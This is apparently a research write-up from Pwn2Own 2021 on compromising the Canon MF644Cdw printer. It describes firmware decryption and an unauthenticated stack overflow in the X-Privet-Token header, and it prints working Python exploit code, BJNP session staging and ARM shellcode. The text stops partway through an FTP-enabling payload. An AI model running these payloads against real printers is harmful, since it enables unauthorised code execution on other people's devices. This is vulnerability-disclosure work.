Diary of a reverse-engineer

Introduction

Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members:

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

Firmware extraction and analysis

The Canon website is interesting: you cannot download the firmware for a particular model without a serial number that matches that model. This, as you might guess, is particularly annoying when you want to download firmware for a model you do not own. Two options came to mind:

• Finding a picture of the model in a review or listing,
• Finding a serial number of the same model on Shodan.

Thankfully, the MF644Cdw was reviewed in detail by PCMag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download the firmware from the Canon USA website. The version available online at the time on that website was 06.03.

Predicting firmware URLs

As a side note, once the serial number was obtained, we could download several versions of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is https://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do?id=OTUwMzkyMzJk&cmp=ABR&lang=EN. As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case: https://gdlp01.c-wss.com/gds/5/0400006275/01/mac-mf644-a-fw-v0603-64.dmg.

Of course, the base64 encoded id in the first URL is interesting: once decoded, you get the (literal string) 95039232d, which in turn, is the hex representation of 40000627501, which is part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next part of the URL's path (/0400006275/ in this example). We assume this is probably used for load balancing or another similar reason. Using this knowledge, we were able to download a lot of different firmware images for various models. We also found out that Canon pages for USA or Europe are not as current as the Japanese page which had version 09.01 at the time of writing.
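The decoding chain described above can be sketched in a few lines of Python. This is only an illustration built from the single example given here: the helper names are ours, and the assumption that the decoded number is always split into a 10-digit directory followed by a 2-digit suffix is inferred from that one URL, not confirmed by Canon.

```python
import base64


def decode_download_id(b64_id):
    """Base64 -> ASCII hex string -> integer (e.g. 'OTUw...' -> '95039232d' -> 40000627501)."""
    hex_string = base64.b64decode(b64_id).decode("ascii")
    return int(hex_string, 16)


def predict_firmware_url(b64_id, filename):
    """Rebuild the direct download URL from the redirect page's id parameter.

    Assumption: the number is zero-padded to 12 digits and split as
    10 digits (directory) + 2 digits (sub-directory), as in the example.
    """
    digits = f"{decode_download_id(b64_id):012d}"
    directory, suffix = digits[:10], digits[10:]
    shard = directory[-1]  # single-digit path component: last digit of the directory
    return f"https://gdlp01.c-wss.com/gds/{shard}/{directory}/{suffix}/{filename}"


if __name__ == "__main__":
    print(predict_firmware_url("OTUwMzkyMzJk", "mac-mf644-a-fw-v0603-64.dmg"))
```

The filename still has to be known or guessed; only the directory part of the path is derived from the id.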

However, all of them lag behind the reality: the latest firmware version was 10.02, which is actually retrieved by the printer's firmware update mechanism. https://gdlp01.c-wss.com/rmds/oi/fwupdate/mf640c_740c_lbp620c_660c/contents.xml gives us the actual up-to-date version.

Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

<contents-information>
<content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMDQ5" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
<content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMGFk" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
<content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMTEx" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>


Which correspond to:

• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

• MF640C => TYPEA
• MF740C => TYPEB
• LBP620C => TYPEC
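As a rough sketch, the redirect URL for each entry can be rebuilt from the XML by appending the query elements to base_url. The sample below is one entry copied from the listing above, wrapped in a closing tag so that it parses on its own; the function name is ours, and we assume the real file is well-formed XML.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

# One <content> entry from the update XML, closed so it parses standalone.
SAMPLE = """<contents-information>
<content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMDQ5" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
</contents-information>"""


def redirect_urls(xml_text):
    """Map (kind, value) -> redirect URL built from base_url and the <query> children."""
    root = ET.fromstring(xml_text)
    urls = {}
    for content in root.iter("content"):
        params = [(q.get("arg"), q.get("value")) for q in content.findall("query")]
        key = (content.get("kind"), content.get("value"))
        urls[key] = content.get("base_url") + "?" + urlencode(params)
    return urls


if __name__ == "__main__":
    for key, url in redirect_urls(SAMPLE).items():
        print(key, url)
```

Going by the order of the lists above, value 1, 2 and 3 would map to TYPEA, TYPEB and TYPEC respectively.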

Decryption: black box attempts

Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]


As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with an NCFW magic header. macOS firmware updates can be extracted with 7z and contain a big file: mf644c_v0603_typea_m64.app/Contents/Resources/.USTBINDDATA which is almost the same as the Windows overlay except for the PE signature, and some offsets.

After looking at a bunch of firmware, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, its format was understood and allowed us to split the firmware into its basic components.

All this information was compiled into the unpack_fw.py script.
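This is not the unpack_fw.py script itself, but a first exploratory step along the same lines can be sketched as follows: locate every occurrence of the NCFW magic in a blob to get candidate boundaries. The function name is illustrative, and nothing here parses the UST footer or the actual NCFW header fields.

```python
def find_magic(blob, magic=b"NCFW"):
    """Return the offsets of every occurrence of `magic` in `blob`."""
    offsets = []
    pos = blob.find(magic)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(magic, pos + 1)
    return offsets


if __name__ == "__main__":
    # Toy input: padding followed by two fake NCFW headers.
    sample = b"XPADDINGX" + b"NCFW" + b"\x00" * 4 + b"NCFW" + b"\x01\x02"
    print([hex(off) for off in find_magic(sample)])
```

On a real update, the gaps between consecutive offsets give a first idea of component sizes before the header format is understood.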

Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F   !"#$%&'()*+,-./
00000050  30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A  0123456789:;9..z
00000060  34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50  45OPDEF7HI.KMNOP
00000070  51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60  QRSTUVWXYZ[\]^_`

The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to form different hypotheses about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt:

• A xor with a byte counter => fail
• A xor with counter and feedback => fail

Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage as we did not have a decrypted firmware image yet.

Having a reverser in the team, the obvious next step was to try to find code which implements the decryption:

• The updater tool does not decrypt the firmware but sends it as-is => fail
• Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates:
  • FAIL
  • However, we found unencrypted firmware files with a similar structure which gave us a bit of known plaintext, but did not give any real clue about the solution

Hardware: first look

Main board and serial port

Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware.

• Looking at the hardware we considered these different approaches to obtain more information:
  • An SPI flash is present on the mainboard: read it
  • An eMMC is present on the mainboard: unsolder it and read it
  • Find an older model, with unencrypted firmware and simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction.
  • Some printers are known to have a serial port for debug providing a mini shell.
Find one and use it to run debug commands in order to get a plaintext/memory dump (NOTE: of course, we found the serial port afterwards).

Service mode

All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files:

• SUBLOG.TXT
• SUBLOG.BIN is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware.

Decrypting firmware

Program synthesis approach

At this point, this was our train of thought:

• The encryption algorithm seemed "trivial" (lots of patterns, byte by byte)
• SUBLOG.TXT gave us lots of plaintext
• We were too lazy to find it by blackbox/reasoning

As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us. We of course used the known plaintext from SUBLOG.TXT, which can be used as constraints. Rosette seemed easy to use and well suited, so we went with that. We started following a nice tutorial which worked over the integers, but gave us a bit of a headache when trying to directly convert it to bitvectors.

However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example for us. So we started by defining the "program" grammar and crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep:

(define int8? (bitvector 8))
(define (int8 i)
  (bv i int8?))

(define-grammar (fast-int8 x y)   ; Grammar of int8 expressions over two inputs:
  [expr
   (choose x y (?? int8?)         ; <expr> := x | y | <8-bit integer constant>
           ((bop) (expr) (expr))  ;           | (<bop> <expr> <expr>)
           ((uop) (expr)))]       ;           | (<uop> <expr>)
  [bop
   (choose bvadd bvsub bvand      ; <bop> := bvadd  | bvsub | bvand |
           bvor bvxor bvshl       ;          bvor   | bvxor | bvshl |
           bvlshr bvashr)]        ;          bvlshr | bvashr
  [uop
   (choose bvneg bvnot)])         ; <uop> := bvneg | bvnot

(define (crypt x i)
  (fast-int8 x i #:depth 3))

Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints:

(define sol
  (solve
   (assert
    ; removing constraints speed things up
    (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d))
        ; [...]
        (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d))
        (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20))
        (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73))
        (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75))
        (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62))
        ; [...]
        (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a))
        (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20))))))

(print-forms sol)

After running racket rosette.rkt and waiting for a few minutes, we get the following output:

(list 'define '(crypt x i)
 (list
  'bvor
  (list 'bvlshr '(bvsub i x) (list 'bvadd (bv #x87 8) (bv #x80 8)))
  '(bvsub (bvadd i i) (bvadd x x))))

which is a valid decryption program! But it's a bit untidy. So let's convert it to C, with a trivial simplification:

uint8_t crypt(uint8_t i, uint8_t x) {
    uint8_t t = i-x;
    return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF;
}

and compile it with gcc -m32 -O2 using https://godbolt.org to get the optimized version:

mov     al, byte ptr [esp+4]
sub     al, byte ptr [esp+8]
rol     al
ret

So our encryption algorithm was a trivial ror(x-i, 1)!

Exploiting setup

After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability.
We set up a Raspberry Pi on the same network as the printer that we also connected to the serial port of the printer. In this way we could remotely exploit the vulnerability while controlling the status of the printer via many features offered by the serial port.

Serial port: dry shell

The serial port gave us access to the aforementioned dry shell which provided incredible help to understand / control the printer status and debug it during our exploitation attempts. Among the many powerful features offered, here are the most useful ones:

• The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted.
• The ability to perform basic filesystem operations.
• The ability to list the running tasks and their associated memory segments.
• The ability to start an FTP daemon, this will come handy later.
• The ability to inspect the content of memory at a specific address. This feature was used a lot to understand what was going on during exploitation attempts.

One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempts.

Vulnerability

Attack surface

The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non authenticated feature. This includes obvious things like:

• Printing functions and protocols,
• Various web pages,
• The HTTP server,
• The SNMP server.

We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware, which were not obviously handled by the usual code: /privet/, which are used for cloud based printing.

Vulnerable function

Reverse engineering the firmware is rather straightforward, even if the binary is big. The CPU is standard ARMv7.
By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing:

int __fastcall ntpv_isXPrivetTokenValid(char *token)
{
  int tklen; // r0
  char *colon; // r1
  char *v4; // r1
  int timestamp; // r4
  int v7; // r2
  int v8; // r3
  int lvl; // r1
  int time_delta; // r0
  const char *msg; // r2
  char buffer[256]; // [sp+4h] [bp-174h] BYREF
  char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF
  char sha1_res[24]; // [sp+120h] [bp-58h] BYREF
  int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF
  char last_part[12]; // [sp+150h] [bp-28h] BYREF
  int now; // [sp+15Ch] [bp-1Ch] BYREF
  int sha1len; // [sp+164h] [bp-14h] BYREF

  bzero(buffer, 0x100u);
  bzero(sha1_from_token, 0x18u);
  memset(last_part, 0, sizeof(last_part));
  bzero(str_to_hash, 0x1Cu);
  bzero(sha1_res, 0x18u);
  sha1len = 20;
  if ( ischeckXPrivetToken() )
  {
    tklen = strlen(token);
    base64decode(token, tklen, buffer);
    colon = strtok(buffer, ":");
    if ( colon )
    {
      strncpy(sha1_from_token, colon, 20);
      v4 = strtok(0, ":");
      if ( v4 )
        strncpy(last_part, v4, 10);
    }
    sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part);
    if ( sha1(str_to_hash, 28, sha1_res, &sha1len) )
    {
      sha1_res[20] = 0;
      if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) )
      {
        timestamp = strtol2(last_part);
        time(&now, 0, v7, v8);
        lvl = 86400;
        time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp;
        if ( time_delta <= 86400 )
        {
          msg = "[NTPV] %s: x-privet-token is valid.\n";
          lvl = 5;
        }
        else
        {
          msg = "[NTPV] %s: issue_timecounter is expired!!\n";
        }
        if ( time_delta <= 86400 )
        {
          log(3661, lvl, msg, "ntpv_isXPrivetTokenValid");
          return 1;
        }
        log(3661, 5, msg, "ntpv_isXPrivetTokenValid");
      }
      else
      {
        log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid");
      }
    }
    else
    {
      log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid");
    }
    return 0;
  }
  log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid");
  return 1;
}

The vulnerable code is the following line:

base64decode(token, tklen, buffer);

With some thought, one can recognize the bug from the function signature itself -- there is no buffer length parameter passed in, meaning base64decode has no knowledge of buffer bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into the local, stack based buffer which is 256 bytes long. The header is attacker-controlled and limited only by HTTP constraints, and as a result can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple:

-00000178 var_178         DCD ?
-00000174 buffer          DCB 256 dup(?)
-00000074 str_to_hash     DCB 28 dup(?)
-00000058 sha1_res        DCB 20 dup(?)
-00000044 var_44          DCD ?
-00000040 sha1_from_token DCB 24 dup(?)
-00000028 last_part       DCB 12 dup(?)
-0000001C now             DCD ?
-00000018                 DCB ? ; undefined
-00000017                 DCB ? ; undefined
-00000016                 DCB ? ; undefined
-00000015                 DCB ? ; undefined
-00000014 sha1len         DCD ?
-00000010
-00000010 ; end of stack variables

The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more.
ntpv functions

The various ntpv URLs and handlers are nicely defined in two different arrays of structures as you can see below:

privet_url nptv_urls[8] = {
  { 0, "/privet/info", "GET" },
  { 1, "/privet/register", "POST" },
  { 2, "/privet/accesstoken", "GET" },
  { 3, "/privet/capabilities", "GET" },
  { 4, "/privet/printer/createjob", "POST" },
  { 5, "/privet/printer/submitdoc", "POST" },
  { 6, "/privet/printer/jobstate", "GET" },
  { 7, NULL, NULL }
};

DATA:45C91C0C nptv_cmds id_cmd <0, ntpv_procInfo>
DATA:45C91C0C ; DATA XREF: ntpv_cgiMain+338↑o
DATA:45C91C0C ; ntpv_cgiMain:ntpv_cmds↑o
DATA:45C91C0C id_cmd <1, ntpv_procRegister>
DATA:45C91C0C id_cmd <2, ntpv_procAccesstoken>
DATA:45C91C0C id_cmd <3, ntpv_procCapabilities>
DATA:45C91C0C id_cmd <4, ntpv_procCreatejob>
DATA:45C91C0C id_cmd <5, ntpv_procSubmitdoc>
DATA:45C91C0C id_cmd <6, ntpv_procJobstate>
DATA:45C91C0C id_cmd <7, 0>

After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code.

Exploitation

Triggering the bug

Using a pattern generated with rsbkb, we were able to get the following crash on the serial port:

Dry> < Error Exception >
CORE : 0
TYPE : prefetch
ISR : FALSE
TASK ID : 269
TASK Name : AsC2
R 0 : 00000000
R 1 : 00000000
R 2 : 40ec49fc
R 3 : 49789eb4
R 4 : 316f4130
R 5 : 41326f41
R 6 : 6f41336f
R 7 : 49c1b38c
R 8 : 49d0c958
R 9 : 00000000
R10 : 00000194
R11 : 45c91bc8
R12 : 00000000
R13 : 4978a030
R14 : 4167a1f4
PC : 356f4134
PSR : 60000013
CTRL : 00c5187d
IE(31)=0

Which gives:

$ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2


Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.
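To make the sanity check concrete, here is a small sketch that reproduces the pattern lookup and then compares the result against the frame size. We assume the pattern follows the classic Metasploit-style scheme (uppercase, lowercase, digit triples), which is consistent with the register values in the crash dump and with the 20280 modulus, but we have not checked it against rsbkb's source; the function names are ours.

```python
import itertools
import string

FRAME_SIZE = 0x178  # size of the local stack frame, from the listing above


def cyclic_pattern(length=20280):
    """Build an 'Aa0Aa1Aa2...' pattern (assumed scheme, 26*26*10*3 bytes max)."""
    out = bytearray()
    triples = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    for upper, lower, digit in triples:
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(needle):
    """Offset of the first occurrence of `needle` in the pattern, or -1."""
    return cyclic_pattern().find(needle)


def offset_is_plausible(offset, frame_size=FRAME_SIZE):
    """An offset beyond the frame size cannot be the saved return address."""
    return 0 <= offset <= frame_size


if __name__ == "__main__":
    pc = 0x356F4134
    needle = pc.to_bytes(4, "little")  # register value as it sits in memory
    off = pattern_offset(needle)
    print(needle, hex(off), offset_is_plausible(off))
```

Running it on the crashed PC value gives 0x1b2, which the plausibility check rejects, matching the observation above.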

Buffer overflow

As the firmware is lacking protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, despite the printer running DRYOS which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

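import struct

# Note: the class name and the ret_addr parameter are illustrative.
class PrivetPayload:
    def __init__(self, ret_addr):
        self.ret_addr = ret_addr

    @property
    def r4(self):
        return b"\x44\x44\x44\x44"

    @property
    def r5(self):
        return b"\x55\x55\x55\x55"

    @property
    def r6(self):
        return b"\x66\x66\x66\x66"

    @property
    def pc(self):
        # Address loaded into PC, packed as a little-endian 32-bit value
        return struct.pack("<I", self.ret_addr)

    def __bytes__(self):
        return (
            b":" * 0x160
            + struct.pack("<I", 0x20)  # pHashStrBufLen
            + self.r4
            + self.r5
            + self.r6
            + self.pc
        )


The vulnerability can then be triggered with the following code, assuming the printer's IP address is 192.168.1.100:

import base64
import http.client

# Placeholder address: replace with the address to jump to
payload = PrivetPayload(ret_addr=0x41414141)

headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    # The overflow is carried by the base64-encoded X-Privet-Token header
    "X-Privet-Token": base64.b64encode(bytes(payload)).decode(),
}

conn = http.client.HTTPConnection("192.168.1.100", 80)
# /privet/register is reachable without authentication
conn.request("POST", "/privet/register", "", headers)
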

To confirm that the exploit was extremely reliable, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed it worked consistently — though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

• Store our exploit in the buffer used to trigger the overflow and jump into it,
• Find another buffer we controlled and jump into it,
• Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.

BJNP

One of the supported protocols is BJNP, accessible on UDP port 8611, which was conveniently exploited by Synacktiv ninjas on a different printer. This project adds a BJNP backend for CUPS, and the protocol itself is also handled by Wireshark.

In our case, BJNP is very useful: it can handle sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control until when our payload will remain available in memory. Moreover, this data is stored in the field of a global structure, which means it is always located at the same address for a given firmware. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (
    EnumField,
    ShortField,
    StrLenField,
    BitEnumField,
    FieldLenField,
    StrFixedLenField,
)

class BJNPPkt(Packet):
    name = "BJNP Packet"

    BJNP_DEVICE_ENUM = {
        0x0: "Client",
        0x1: "Printer",
        0x2: "Scanner",
    }

    BJNP_COMMAND_ENUM = {
        0x000: "GetPortConfig",
        0x201: "GetNICInfo",
        0x202: "NICCmd",
        0x210: "SessionStart",
        0x211: "SessionEnd",
        0x212: "GetSessionInfo",
        0x221: "DataWrite",
        0x230: "GetDeviceID",
        0x232: "CmdNotify",
        0x240: "AppCmd",
    }

    BJNP_ERROR_ENUM = {
        0x8300: "Session error",
    }

    fields_desc = [
        StrFixedLenField("magic", default=b"MFNP", length=4),
        BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
        BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
        EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
        ShortField("seq_no", default=0),
        ShortField("sess_id", default=0),
        FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
        StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),
    ]
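For readers without Scapy at hand, the same 16-byte header can be approximated with the standard struct module. This is a sketch that simply mirrors the field list above (1-bit device, 15-bit command, then error, sequence number, session ID and body length, all big-endian); the function name is ours and it does no response parsing.

```python
import struct


def bjnp_packet(cmd, body=b"", device=0, err_no=0, seq_no=0, sess_id=0):
    """Serialize a BJNP packet following the Scapy field layout above."""
    # device occupies the top bit, cmd the remaining 15 bits of one 16-bit word
    dev_cmd = ((device & 0x1) << 15) | (cmd & 0x7FFF)
    header = struct.pack(
        "!4sHHHHI", b"MFNP", dev_cmd, err_no, seq_no, sess_id, len(body)
    )
    return header + body


if __name__ == "__main__":
    # SessionStart (0x210) for session 1, without any body
    print(bjnp_packet(0x210, sess_id=1).hex())
```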


For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.
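The address arithmetic is easy to get wrong by one, so here is a tiny sketch of it. The constant names are ours; the values are the ones quoted above for this firmware version.

```python
import struct

BJNP_STRUCT_ADDR = 0x46F2B294   # global BJNP structure (firmware-specific)
SESSION_DATA_OFFSET = 0x24      # offset of the client-supplied session data


def thumb_entry(addr):
    """Set bit 0 so that a branch to this address switches to Thumb mode."""
    return addr | 1


target = thumb_entry(BJNP_STRUCT_ADDR + SESSION_DATA_OFFSET)
pc_bytes = struct.pack("<I", target)  # little-endian, as written on the stack

if __name__ == "__main__":
    print(hex(target), pc_bytes.hex())
```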

Initial PoC

Quick recap of the exploitation strategy:

• Start a BJNP session and store our exploit in the session data,
• Exploit the buffer overflow to jump in the session buffer,
• Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12


To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr


Putting it all together, here is an exploit which does just that:

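import time
import socket
import struct
import base64
import http.client

# BJNPPkt is the Scapy class defined above.

# Assembled Thumb payload (the snippets above); not reproduced here
shellcode = b""
assert len(shellcode) <= 0x180, ValueError("Payload too large")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.1.100", 8610))

# Start a BJNP session to store the payload in the session buffer
pkt = BJNPPkt(
    cmd=0x210,
    seq_no=0,
    sess_id=1,
    body=shellcode,  # Assumption: session data is sent as the raw body
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

# The printer should return a valid session ID
assert res.sess_id != 0, ValueError("Failed to create session")

# Trigger the overflow and jump into the session buffer (Thumb mode)
overflow = (
    b":" * 0x160
    + struct.pack("<I", 0x20)        # pHashStrBufLen
    + b"\x44" * 4                    # r4
    + b"\x55" * 4                    # r5
    + b"\x66" * 4                    # r6
    + struct.pack("<I", 0x46F2B2B9)  # pc
)

headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(overflow).decode(),
}

conn = http.client.HTTPConnection("192.168.1.100", 80)
conn.request("POST", "/privet/register", "", headers)

time.sleep(5)

# Close the BJNP session to remove the payload from memory
pkt = BJNPPkt(
    cmd=0x211,
    seq_no=0,
    sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

sock.close()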


We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

• Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
• Make sure the screen is turned on (for example, by disabling the energy save mode as above),
• Call the display function with our image data to show it on screen.

Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like below:

struct frame_buffer_struct {
    unsigned short x;
    unsigned short y;
    unsigned short width;
    unsigned short height;
};


The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y
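For reference, the eight bytes that end up on the stack can be pictured with the following sketch. It assumes little-endian storage (consistent with the "<I" packing used elsewhere in the exploit); the function name is ours.

```python
import struct


def frame_buffer_struct(x, y, width, height):
    """Pack the four unsigned shorts in declaration order: x, y, width, height."""
    return struct.pack("<HHHH", x, y, width, height)


if __name__ == "__main__":
    # Same values as the assembly above: origin (0, 0), 320x240 pixels
    print(frame_buffer_struct(0, 0, 320, 240).hex())
```

The offsets match the strh instructions: x at +0, y at +2, width at +4 and height at +6.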


Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12


This leaves the question of the image buffer itself.

FTP

Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

• Enable the ftpd service,
• Upload our image from the client,
• Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous clients, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
